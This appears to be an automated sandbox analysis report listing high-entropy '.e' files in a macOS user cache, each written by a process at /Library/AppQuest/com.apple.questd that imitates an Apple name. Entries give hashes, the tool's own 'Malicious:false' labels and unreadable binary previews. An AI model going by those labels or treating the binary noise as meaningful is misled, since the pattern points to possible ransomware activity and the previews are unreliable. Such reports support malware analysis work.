                                                                                                    Preview: ..;"a.........x...ym.:.O:.`q.....K...).q...}.&6..2X......G.[c.Q.MT3A2....bW{.....l=,.%.u....kt.}.7;s.....D..|..)2..g....;3.S..S.O.Q.....jL..*........L..~.....U2..\.(.....!...=.....i...k....Zi.5.,.)..U..Gu^.D...fH...T....r.<......D.,....Ja..T_._>...d..u..G..Q..;>..Z....M..s...%...._....>Y...9.F.j..2>B..j.~.^.)Q.k.o.(u....3tL=..\/.K ;..aYQ...r...cs..P.....q.......&u........[....(A&.u.w{.R.EW.......$.*)q...#..).EZ...u..l....e...9&B....V_...?...`qo....=...p..7'.7,p..QE...D.Z.......X...j..Mo6..mz.5..N."._9.&=.j........\W.='...m.Q0..S.Z.Kx...B.z....)...y...~'..ZI..U...b..Wo.=.....f}.q=..9.R.@..2,.w.........4[.Cs...a..e{6.@3n...110a?....Q.Ql.;m...............:-.p...<..5bn.A..S.M'Rx..!..N..U;.\......$........8.....u......\R~..}.F..5r......w..RJ..J$...A`b_.P..(.....(v....<...S.>.p........b.....AU.cq+...I....w.h....s..w7.....C,D...<{...T......d.zc*2...o........E...0...UK.6.NL..c5,K..^.zE.....&.%...y...=Hb.....&..l.s.x#7Fe.*7...6o....D.5.k.B..1......6.:.M.....Q...P!..tW..N...}.n..G..k{......4..En
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.320D9CE0-EE03-4F53-9F48-1BEE1701EE69.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15634
                                                                                                    Entropy (8bit):7.959133182920609
                                                                                                    Encrypted:false
                                                                                                    MD5:7248BA1C653EFF6159D6116CE2154062
                                                                                                    SHA1:29048640068479EBA1DC30DB7D9F3ECDD2D55B11
                                                                                                    SHA-256:D2E29FDC4DC8122B3FC6E814135EB5014E4E5CBD623F439EA018BDD225CC6304
                                                                                                    SHA-512:719E88CC2711230C2CFF602440AF71C5BABC6E55F627D15309BF0428F82A418167F6F2C3C2090F4AB65C7B65FB0D23E6A15A3018585233C864DCE690B1C4AB3D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0.............1..}..)[4.@.o.........Ot,u.K..6.....3(Q...=R.*.=..h..0...8>0U...@.......Y....m.I.0.....8.f.JE.!P..n........!.....j.kx@e...l.K..1*.9$<..<:...........r.....x...........~L:P...Jg.I.dW*'d.i...2l="......\.oF)'6..P...a....=c.......PBWF..4:.Q..nUE...M:......C../&...."i.:.....9.7J.i(j....I.n.2......]-q.s.,.U.Gk..k`.|,.$.@~..q.:.....W..%.....[.-`..#..6.D|.....A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.[d..*.~D......e.d?.....t..P.+].k4D.R.....u.F...F..m^..,3..Xy.S.<.A3._.._....X.:..c.......D*.~..h..V.Jn.l~$.c#....C.li5..."%Y.g........>..xJ...#6 ...F".7M......&!@.7....l...m8G;...R.d+...&.....r......+.....Z...|..P@.....5]....a...=....%x{.7...!0...h6Z0!{..09^>...O..oa..h.....i_.I0~7dFw+..<jF`S...Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C...k.z..S..K..3.&e a..-O|,.$.@~......m.....{.Y..CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1...j.....I.."..t.3..e..C+..5Y.../..?2...h~q...............n.....x"...7i.M8.8....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.37BE9DB2-9E70-4030-AF7B-244D4DBBBD50.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22683
                                                                                                    Entropy (8bit):7.985247716740577
                                                                                                    Encrypted:false
                                                                                                    MD5:F9B0FA221BD0B528BEC71D0490DDBFD9
                                                                                                    SHA1:60FA5A569D22245321EAF734CD0040FD2E9F38E2
                                                                                                    SHA-256:F0BFB3D020BE0641C812F505EA50C4438CCD0297191D59B2179F2BF7056E00A2
                                                                                                    SHA-512:A2D1CC59C06582407DE6FABACD601705AF5A87A8D8C604E7CD11BF5D14BB8976EEC0928EAA6368F1A3BE640C4A8D790690E00C7A8351EA7C4EF38657D6924402
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..u..9..=.B.6.aU>.....p..<.,[..."-.....Un.X.`.&..,..9..)4.'.T.+.O........muOH.E...F.F..?..fg.JP..f.E..g..>.C....H.....)~.C.....Z)..UR......... ..@eKNY.i.....\#..Wda..+.!.=.+.{....9..'...Iu._'.....Ych..e..k8..}G.tm..HT...6..LgA.U .....R.+.,.t.=..o..zM.....6....Q.........1../....;} .d{.7.yg...J..1$.(EBbd1.u/u........!F...................V..rL....Vp.J.E.B..T.......B..L..\..0.GYz..&."8..i.. F#+......O.1.K..B....f..#.9..B.......:....i.?1.....2....vv......Y.B....y.W.#......Hh .....KT./.A(ZD....R..../R..!..4..67.H...];?...$..q..p...\....=hsn-...oj.|L..F.M..!.m..vk..Dj.@...............t.]p5.{.............QA.........kl.?.a.~X..8..-.......~...7...S...i.EIQF..(.~i...%..1....."|.3..o....9.\[s......wu.7.....>...qL.1....<.......Qz.Vi.nf.R..rKi........E..#...L}b......K...^..?..E/....l#$.l..N-.V.,......<ER..,....h.....nxN.*!.L..../.n....{.$..Cw..7'.....;-......~..!p..6.^.Q.zH.K..@..!....c..A.c.-....3('.&...c...eq.....`5.g.}........g..G+..>..L.....=....AJ.1)@.'7{..+.u.c]....Y#....|.i..@.-.J.z........B.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.396CDBC7-2564-4182-A6DA-CE4357EFE03E.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):32123
                                                                                                    Entropy (8bit):7.969350801564822
                                                                                                    Encrypted:false
                                                                                                    MD5:C8DE8D9A41C1F9CA17D7E7BE48BD697A
                                                                                                    SHA1:10755EF87FFD27062E85757E64D2CBFC86278652
                                                                                                    SHA-256:4C92C3AB6534824227342ED27642188388C938F64134CD1E5D64FFD718A8DD57
                                                                                                    SHA-512:860C1D74653F64080A3AE0514282196D2ACA525CDD3D148507D7C46C56DC2E6B930370FB3AA94E97402D8762BD01F02881FFDCC13FCC91BB3C68659AE51B9554
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...MC$?*L(-u.H..,q....M7....(e._WS6.T.6"a..6.....3(Q...=R.......O..k.....B..6.wc...v.$...#Ee?g....C.G..?p..o._...o......q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(....k.d...CmQF..V9).....W......:r..._S....N...b......:+aO....,.[........[16......p..L.....T.R..V...~.n...D..][.p3.5n..wU.*(/...@.0..UR............8..x'E!.+.Dq&....`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5.7..r\S..^i*...MTwV.......[....i..8.{....Ko..?...e(r..g..I(...w....<mV]..\.n?._..6...D....U..\..}..e\...i.!.j.)v.Ma2Q...=.+..7.*Y.\xR.J-I....ef.......FSu...i.%.l...m8G;Y.....(e..&.....r......+..a.?...&..rN~7.p..M..4...,.....P...z.\.W....iM.....O.H...Q-.....{7 ...S...u....._.....J...]..~.....`...SFx!..rhdb.....$...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb.)?/1....r.fv.s..cM2].:...../|....E.>.<..!.&w...1..Cv..^.$.s.....H.q........}.N.{k".O..Y.[T5....qyv..`.C89...w....G)W......9E}U!..^...Q.76....r.r..hM]9!....FW.....a..,.*\...$7`...0}o.........C.....|......i...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.44DBFA1A-BEA0-416A-A3BA-3949F5BE17EC.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):43460
                                                                                                    Entropy (8bit):7.9719404199761055
                                                                                                    Encrypted:false
                                                                                                    MD5:ECB330260A788A486E0103EEA741389C
                                                                                                    SHA1:BEFC77B865448FE27C3FD1F3E0EC0CF6F5F1E581
                                                                                                    SHA-256:DD8B1AF3185F9226F0CB5F2A790EC1F8E482484FD760DE6CA300A5288DBE47D0
                                                                                                    SHA-512:538E16053CBBA324AC6180ACBFF3B3508C320CC8FCA084399BF80CF3DCAFD05DFAC9906E2AE8D28E0C1DF2DB4B7FBA17C625F970947F2E490A7063B2097BA3E5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....b..goj.B......I....z.;..p.5Sg.*|.......6.....3(Q...=R........6..sz83.n..6.wc...v.$...#Ee?g....C.G..?p.....0..eMu.P._........M.......!.!..x..........h.9j.....X.#2K__...}.u..........s.......";.../S...........j".[q.O.....:Z....8.A........O.j........d..b.. ...D..l.)xS.4R..X.I............IUk...].......'.....P.+].k.j]..Z..NF)s...X@.c...}.a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...CS.."...D.....U`.AQP..%9.......)..6!..[..}=...`....(.. .....Il......DKD.)|..*>c....V.;"..a4...i2...../#o....$G....e.....n..... ....}....l9.})0.....=..K......X.P7..Z.}*.1w...+..*.q.:....1..KkT..8m!..8^.....C&..u2.....1r.)........A<o...D...v..g.+.....#....CV.J...a.u.@...~6,.oRa.H.N.....`....DdSj7o.L.@.c....k..z..Y.9[..;......a^....F.....e.....%..I.P.....w[..".+~...WbG..6.b..i..G....l.H....,k]S.....#f.kk..z8.J....C.....n...a.A.....9...u.T..>.Fc.U../...u...Ur.}E.Z....m.(-tpdE."....M....`.B...-..h....O.}..R..v...2. .......MO.u..KK.......vqr.........../.Eu..~.a...O..cRP.:{7.fJ
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5D5D1B19-5428-4BBD-9E3C-00384EA9F506.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10482
                                                                                                    Entropy (8bit):7.94469395709357
                                                                                                    Encrypted:false
                                                                                                    MD5:CD313ECCA8803E1AE4409796F2152A6A
                                                                                                    SHA1:FBC169279D5CD82DB92E4ACB03EAC9B7C69A7D34
                                                                                                    SHA-256:919B1472721F50894CA55406FD524BB786EFCC181FB858DF523E424AC62BAE3B
                                                                                                    SHA-512:E8702FAC59C716EEF1167D327665A8BEDEE1B6F402811C4682B0AF476842E680B73A4A947082CAC9F551BFA1D5E43B02F992949E6972222F4F8AF080B4D1BD9A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..9V..G.I.9D...VD..:..?....3./q!r.....4....6.....3(Q...=R.V...[f.....O...+OB\....... ..._...ii..NH..W..z>...&.....U.C>..........&......W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB....{.......f..P.Q..4.......+.B.49V<j.m....7:.... ..yk.x....M..#N.....q...`..5.\..y^.Q.u.w..@>C+...z.T......k.I.}.7......4..FB:.d^>.-.-T...B.=....T.5.h._.@..A..#D_x4.Cg...`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5....[...X..-.6.P.7.F..............8.{....Ko..?...e(r..g..I(...w....<mV]...Bu.....6...D......u.......m.m..y..5..ZWJ9l..G....oK..0.xJ...#6!..c{Wq!)_.R/V.U..k...t.l...m8G;...R.d+...&.....U.C>..........&.....C&.........FT\.u^..6.r$.....b.k .....x8$.e..Y.E...|U.....BX..ls.a...4z..U.0.a..?`......fj.n(...p...&R:....b...^\...iA.:owQ.H.._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~.....o....u....@Rqx....-.Z.^>.-.-T.......}Nb1..52...X?p.:......."X5+.L..+......zg.R....A..!D...,O."..0.....=..#>V...!.....98....6..G..).&....h.O.D..9...uH.Z..a.......mU...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5DF0E37F-DF72-486B-B657-8E967F07A104.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17843
                                                                                                    Entropy (8bit):7.979397568690006
                                                                                                    Encrypted:false
                                                                                                    MD5:3D488CB95896F2577C73E7287EBEE93B
                                                                                                    SHA1:82541EB73B306071533F0EF97C179D9A90DAA6C2
                                                                                                    SHA-256:4D878169B2B67F8C12241CB3874D75107960DD429A82A1818D392803FD9F0D9C
                                                                                                    SHA-512:5FF6042A0AF91D668694650C1E632DC93647EE50CDA030483A986342DA425633CD2D495CB910A3E7E03B8AC66F3C15DC6D94587DDD4103B9F9212063378D202E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)N..MT<4.........@6....b~w9...T.z..c .4....%...,+.n..W..1.....m0+...,.K.8)...E._&.`...[#... !..c..o..=.!....t..........@.........\".7....ap.~..X..LT[cd..h.%........m.F.yT9.Tw....+...t..O.z.6;\R.FZ.....f.S.t...GY..$OUX.........T$.:...z.....o._G._R...:.y..~.....c.r....aa..b...t.....|5.T....4.x.....9._.}..<.....L...n......o.E/..~3..K.X+.;..GCL.......f..Z..F.....nJ.....Hn.d...Z...m..p/v............@.......||...p..p......8..yK:....w..K...,.../......3....*..lO.).>L.x..z;.o..........[.Lup......:V..A.....8.T.4...<..!.bV...|{.)%....P...RH....r.kf5...O?V...%.1..D.Q.2}....hd.M....lE.t.....t.nZ...48.....n.@:...5yH...eQ.d..y.....!...,...cS.8.,N..E....\..0\}<pW.:.r.H.KA`]yk.&.......$..a..:.x9G.u..\...... n"RM.U...o.GF.....HJ.|.eD^`8I..+.@....]...vM..8I.4..`a.6..5V:....6.y;.vj.I...E.N......f./.#.>i./...o.. .R...&G$..v.[73........j.V...I.C.....].....u.....a/.)..VK.....:..6...........2.]...8..n....%A...1....>.%.gf.Y.0.....t"X.0.;e..Y&..p..4D.Ik.d..[...e.j...^&........U&bM...A.|.Q.1F.v.....[..v.k.D%.,.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5E5BAA37-7C33-427A-8BD1-E5CA17F08561.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12218
                                                                                                    Entropy (8bit):7.967115454350584
                                                                                                    Encrypted:false
                                                                                                    MD5:ACDE3C3F56163689AA4D8C6F4CD21ACB
                                                                                                    SHA1:1083505AEAE14EC22ACCAE7A46746530382DA852
                                                                                                    SHA-256:AFE942707D2521F9177E851578D9E7BE6ED6BC905458D1213292904088D844A3
                                                                                                    SHA-512:3E1E2F9526D6986B686A145702C56922D8B9E96BBF97F42380DBBD67E6D810331B3BD9365ADE9EEE5393737E2DB3157FCF36E214368F46FC8A52AF49C9A3E77B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...f....M6..........H.....D.3.f........"...ESI........n,>C+j=..Wz^.Y......I.nO..C..~.)^Soqw....>.V#......b4...n.Y........?`G.<...b....ta..><...>v.J..}..B.{.I.ok....t......&JK.=X..'.a.....l...8L.'...fq.*..Q....."...b..........~....|f.....B....hh.o.3|w...P.l..........~l\(+...j>..1...Y...<$.[...^y.....Wr..]/K.BR<A.......`t../.O@s....)...q...L..2'..kr............d.!i7T.4LT8.Dv....\...&.^.q...y.z..o..M.Pse+....uOg'.H...<p.X?....T.y..Z.I...u....{.^.X|A-.)y.......kk.....sY.Q..q.\..*D1O..6.C.X..c.D.O.s.....7...;..B.5...Q..z.8.g..l;L.N((.....)./mW.L3.(~+....a..t/.e..S.=l.3.G......`...v..R5#...=.uw...........5...T.I.Q..a.....$,27.S..J.....@e./*k=..]..l.0..n.....~.....'..-........#.I.h.4...B.....L.....mf0..U...k...!.N......N.Q...)......q.m;...w...&.W.s....+..X.8(3...Z......L......s.g?vF...@{........LX..S.UJ...7\.S........ru..+...H:2s#BI.]t..".)...~..k.L.+T..5.`/_V....dx.(..+%...)._....qC........<..H..M....$....k`.+l.... .....n7}....?...j/[re.D.fUX...+.`.....%..P.q.U.........<.#%.6TB.b...K. .N....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.5F138737-38C4-497C-BAF5-ECC173871910.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7866
                                                                                                    Entropy (8bit):7.940024367236677
                                                                                                    Encrypted:false
                                                                                                    MD5:C533063283DC82DE2731B4EF01D7D9C8
                                                                                                    SHA1:99CF335D5333DA5ACFA0C53D877FB14673DA638F
                                                                                                    SHA-256:AECA885F8E5D6EE56AA75DB3FBBD5EADAE4C2E3DFC2B0AE6DC62AF61660DC809
                                                                                                    SHA-512:1299A0934EE8F150E4FB1FF9FBDA5E4388A4C2B2A3B05AD5E9FB8313B6FDF0AD083B3B55EC7532B29ECBBFD663C135E09F45A34558092601641FF149F42829AB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 6.)/...x..spT..p.e...h..<...^.I.....F....wJQ.....J....t.9.O.k.^}......U4.....@...Rt....j......y...U...<L.......R.J.A..~B.Q..Mf....Lc2.k...T...)9..J.F.Sz.W`.I.....zk.x\.4.. ......H...Vq.....^..~|v.,."..p."fe.i.......4;...h.-.q..{-....W..tN..-V'...j..4.g.....?..r...7^........:...... ..R..s.hH%.+.~D..P..=..`.N..4v9.V]T8H..;>p2..4*....J..W.......%......W..s.siFq3......Q..c[.l...I...............e...7..g.0vR...y.-.Z...@. "-....5t...0Ag.CqX\T....p.3O...TU.s.E.2.. .....9....$4.........@.......c^.J..O.S)S..Y[.u..d.V...F...*."...u".....wb.')....'.....e.l.B.......lX0SK.C.%...hf.....;E.....Z.G.3.N8)=...#..` .a...6...z......P.N.j..[..[..i.%+{N+|....t...n8......%.u.....23u...g?b....X..M.BW..X..?k.cf..9)..M.A..>U..>.r2..[..RVSQ.S..... ...Dr..y.@B....k.).G.X..3.Q5....Q..;R..\..?o.h.*....i.|,.....4.i.M(..p@.=.}..!....9I.......Hb}8.Il0fg.aA..........rZ...q..|y.%Jf.s..+..N.Z...C..S....*......}5.......k....H.>........J....s..P...hUF..e.X..~^.:.L.mj...#...E...z.....C.A.....S.G7..b....[.^....Y.....8.....5.H
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.61B51FBC-16F4-477C-96E7-75C87A33E798.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10498
                                                                                                    Entropy (8bit):7.961924810787067
                                                                                                    Encrypted:false
                                                                                                    MD5:04DE68D66E556D95A78C1EFBCD28A587
                                                                                                    SHA1:C4F29B76B3C3D627902CCAAF7DCD44C4415ECF64
                                                                                                    SHA-256:1D157D93027DE60BDEB83830526E5F5AA7C22812537C6E460B0FB7B4F340E6E1
                                                                                                    SHA-512:18FD521CDA617AF3D147891591EBD6F76237963C3B8909D074579DDEF38AC6086E702407AFED51701E6F815A4569BCE5E374D08A8883F60C3C6E952E03081EA6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .h.K..x....w...:#...I....Z..^...8G...v.Eqv..R..)...p...Y.....;.0.......M6Lo......lR..u...{......'.....|...'...(..iN.C#......|:.7. ...5.Ey.b..l....$...m.......".-.........E.{[!....jF..C\.<..)...............5.....z.e..J..:.j.M..}......aF.b...hU>R..t..!..~g.<d/J..&TiW.7E..?...[L.vL..q..",.&g.H.g..?.;.....k%.V7.z..B.uo...j..*.y.g......P).s.26;D...h.#E@....P.g...g....G./.V...>...6.hS0..q.Y....1x(_.......V....$....k-}.R....hf.*t...U.d..$@....,,+._.....5EW;.h......W.S........^.OO..=/.K..B...b.).`.^....&va.....]AF....<JW..........B.h..!>9....:Q.....i...J.T.ym.,..}9..X/.....-.$...}`QcZ!.j..@>)......?.d..<.2......W.`..P.2..H..n.gX....%..0......0.......o.........'.b.7....D...ho.k~k.'~...<.p..*..d........w^@..).....T..I.(h.vwP_JU2.bX.....m"Y...!..S.._/.U...K..@....qC..%.rnm....l7R...y..I.n,B..Z.(.../.....=..z..KW?.lP.g.TT...Z...E......n....8.F.....+ fI.,.!.!.^....D.8.......N@......=.....JF5.[xd...m-r|....L.....-.....n.!..B.....gB........SXJ..y..R.T......X{..Lv..pB.4..``...?..MW....2#p.;......".=].
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.6644E9F6-D242-42D3-98D1-485AE5C2F63B.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16634
                                                                                                    Entropy (8bit):7.962809400392255
                                                                                                    Encrypted:false
                                                                                                    MD5:5EBDC398FDEF744F7688880E5013E9FF
                                                                                                    SHA1:547F3BEAADB0C7ADDE6B7679B216CD3FD393F9AA
                                                                                                    SHA-256:1090AFE37517E36D36CFED613F26F91999D1BF6DDC9B42A7BB3C2AEB2B3818BE
                                                                                                    SHA-512:05BABE5DAD3939F35BE7381A6184D8906DA254AF4C993E8E2B0A6F1BBA397E873370E7F21EE166A5328CDDD31E65DA91ED8FBE7B8B0188FD363E35B08536BB28
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...~A....#t..ao4.aAh9~Zg.....<.B..C........6.....3(Q...=R...S...u.....Z...u/$-.n..pe...I...u....-..q.:....1..KkT...p...7.L.;.`nY..b.Z.bn.g...Pv2...mP..k.Q4c....(..<i.>H_.....zg.R.(|......p.u.7+..>.k|..N.nA5.*..no.B..q...>....R/.....hX..^...y.v}sy....d+;rP|.u.~d..e.A..;.......;..-.j..5..B.#+`..e.....g...3M.@.d.J..\.j....|.....Z..l.jx......n....@............A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M...q...b.......z....%...}..........V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._.9...N?..c..........Hl....6..$...I/..7Mx9.})0....=.0..3]?s............"........s..!...O!x".o...g..^........N...........<..1*.9$<.&.U!A.^....C&....D...e%Ao.F.....B.\>..Ti.V"..?q#....CV.J...a.u...x...._....c.z.../.....(.|.Y...U.Z.S..Z..Y.1.~..9[..;...L|g...Ij..n.F...%........<....a nE[...h.-O=~.... ..g.qZ....!.8-..3(.f7...e.....DA..D.~..ju.......U.$N...j...1....F.....e.....%..I.P.....w[..".+~...WbG..6.b..i..G....l.H....,k]w..qT~I...1.#.....S.f......n...a.k..{.......3#..:..-N...5.i...3...i.....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.703FF13E-7073-46E3-8806-78EF4D8D2D8F.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):5818
                                                                                                    Entropy (8bit):7.897252700502589
                                                                                                    Encrypted:false
                                                                                                    MD5:AB4923BDB02B7125FC5C1DF86C37DD61
                                                                                                    SHA1:1990AD8865B4FEC745B2E0B2FBFF033014CF93C9
                                                                                                    SHA-256:A78DEA98316AF9F75B050398668A69BAA284C53ACE219F5B30A936C2F4597124
                                                                                                    SHA-512:AB0DF00ABD28887C1F6BC5BF0E0BC374D3135ADD50079D4D6181B6B2F4B662A4A9E02EFB1695F278BF39D4BB1D70F374B71D952DEF7E6A3A2EC8CA10A7A99533
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...=....@..4B..T....K6%i}D..J..\3..Nm..9t<.6.....3(Q...=R.....mL...Z..:?.b.. ..._...ii..NH..W..z>...&......ZI..ET.l6.....7@e...l.K..1*.9$<..<:...........r.....x...........~L:P....j_V2M..#...H.@...lIO..|3..n...?.D+._..Y..$.3........?...q..8.F...cx#..m(.tG1."..p.G..E].,..z._(9.7J.i(j....I.n..yf)....{@r.......e.1,......E.:s.q.:.....i}h.-..+.g..:..1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V..m.cf5.ai.;..:4...5..[.L......A...Z..Qx;>B.....L....7t..5Y...Dx..f._....$.....TG.Q...\...N[..<J...5..:.!.......syV..A,=m....H....-M.g1.+....a.}.+..C.u...].wD......&....5....y.....`........%.=l.O..........c..#..lg......s1.....q.....5....g6....&A......d;8...o"r.)..u.....Y|#..w..pu......K;2.6.o..m.Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C.Ux..&.....h......^.1.,.......).Mys|..%..n^V.j{.CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1.CC.+.D..ZgHV..U.......)...-W.;...........s1....'.....^).U..]P.X....v,...........N>..t.O
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.707351E8-3E00-493A-ADDD-61588D2FCBF8.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6890
                                                                                                    Entropy (8bit):7.9090124157803405
                                                                                                    Encrypted:false
                                                                                                    MD5:77C6687104BB6CBDB677303121EC4C52
                                                                                                    SHA1:0E6D99937CEBF5B4AC07AD38B1FD33A8B11E4824
                                                                                                    SHA-256:811C52744162096B5C539C3073AD68FF9C5B64608FC0C25F9C0AB0CCF5A9DCDD
                                                                                                    SHA-512:633E97ED834DD8A831D7C4AB851E130AF88A4B9EA8EE607CBFECA12081CF20E7F4C6EB0E63D22A393CF6DA70A48CF8EA65A69A314DED89006F62626AF8A51745
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..j.q. V.....3.V...%.a.d.!.9.X........5....6.....3(Q...=R.ixD.v...4h.b>.......*.O....l....oA.............<..1*.9$<RPB..iq..c......o.s.r.m..!.w..#?.y;-..L|...zI.*?..2....7.M.>x?d......U..<...y.....[K....[.K.._.n...Y.I..%nC....^..)......|..0f....0.a...Tm'4...A..S..0.x:a..9...R..:`PV.BC..A..F..i9HN[.....Da;..*...x.D.<u..f..U....f,..5zO.=..(b.V>.......uph..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s0.s.5/'..M.+.C.3U...9..Q.#.>E.oY.T..'.C.Cd.d. ....:..(.?,..M..z.......".0K.K....a.....`p.....XBX.=..~...i.!.j.)vC.S.....7.w..uWSY.\xR.J-I....ef..t..*.xr.%...B+@_o.J.]%1,.i..b.ZU....f,.C.G..?p.].1..X.......'.=...3.....r...u:@.W{....g..,.J...D.Q....'.M...C.........?.....yk....w.....2w...z...#...Vh1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V.w ......cw.1...~4...)m....@....zM.......<..g5...G0.|..C..>hP<...N.~...8...on"...'0cx.DM...C...w.~..-.q...^g.<.A.>.:.S;.........)A`!.C..'xC...............N>..t.O.U.....gi....}...........JN...c.%yB......}...W..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.70CE8F34-E030-4DF6-A02D-5AF5509884BA.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9210
                                                                                                    Entropy (8bit):7.937331997731138
                                                                                                    Encrypted:false
                                                                                                    MD5:B1CC6ACEAA6B2901770438C2D0649FD4
                                                                                                    SHA1:D8260E5776E007F6DEEB8A5531BA04E0439A9CB9
                                                                                                    SHA-256:442D94538E176467A9BCDC68C921F3F1BEDF5B78592BE0A088E7AC810A1A5980
                                                                                                    SHA-512:C0079250250E380618C9176B69055EDAB85DDBC79EAD25E9E1F9B00BE3BC91F1953BF232696947DB957873FDC9F2A684BE7FA9E20357CC452F9DEEE4659FDB82
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...c.Tq....Y....6.<.V..".].N. .....9$.<>...6.....3(Q...=R.......O.,.tk.V.T..6.wc...v.$...#Ee?g....C.G..?p..Z....B.Mu.P._........M.......!.!..x..........h.9j.....X.#2K__...}.u............/&...T*..R.....e.\...;.o.}.@........k. .I.:...I6..v.. .b.W.b.&...f.$.cM<.+$...\....X.t.C.I........]:...>...[.Yo...B..../]r..*p.".j]..Z..NF)s...X`b8.....a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C....T,,....3x]^....r..*z......)..6!..[..}=...`....(.. .....Il......DKD.)...*.L#.f..k........u...f....R..i.!.j.)v....M.?z2.....?.Y.\xR.J-I....ef........r.Zg._.?........+.5j..U~.U....f,.C.G..?p..Z....B......'.=Q........=F.MC.&-J..N'D..............r.E...u.+....!0...h.6.Y...q.1.C..e....y......e......JY.4..v.....X..Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C....T,,....3x]^....r..*z......)......m.....{.Y..CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1(......P...O.$2r.xIN0P.,..K.....h.......[..!F.%)..;.q..u........(%C.@...P.:{7.fJ
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.73CD0EA8-B203-4246-A3D6-6569224746D4.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7714
                                                                                                    Entropy (8bit):7.923751495928891
                                                                                                    Encrypted:false
                                                                                                    MD5:C48B91D12F1547C95B16FE3ADA0BC227
                                                                                                    SHA1:585745CB209CB1D133DABE977563320B46DF84D8
                                                                                                    SHA-256:16E347CDED34BF51D277214E5BA36110C5B5F4C3FD1447EC4CDAC918B6BFCB42
                                                                                                    SHA-512:D1DD76434393CE4BC975BAABB20F5EBFA5ACA5A0C0CFBC673A902530B08ECB910E75B3F50B7583FF730314BCFF5F02327190F146F776DBC66CD98ADFE6D9E736
